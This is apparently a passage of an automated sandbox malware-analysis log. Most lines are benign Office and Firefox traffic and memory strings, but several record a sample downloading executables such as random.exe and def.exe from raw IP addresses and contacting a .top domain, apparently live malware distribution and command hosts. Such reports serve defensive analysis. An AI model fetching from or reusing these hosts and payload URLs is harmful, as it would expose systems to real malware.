Source: global traffic HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A461000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A461000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3045686159.000002348B7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2972813755.000002348A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || 'www.' || :strippedURL AND :prefix || 'www.' || :strippedURL || X'FFFF'[{incognito:null, tabId:null, types:["sub_frame"], urls:["*://trends.google.com/trends/embed*"], windowId:null}, ["blocking", "requestHeaders"]]https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/AND (bookmarked OR frecency > 20) equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2959811201.00000234898E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || 'www.' || :strippedURL AND :prefix || 'www.' || :strippedURL || X'FFFF'[{incognito:null, tabId:null, types:["sub_frame"], urls:["*://trends.google.com/trends/embed*"], windowId:null}, ["blocking", "requestHeaders"]]https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/AND (bookmarked OR frecency > 20) equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000003.2840171314.000002348F1FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.2959811201.0000023489872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2959811201.000002348985B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", 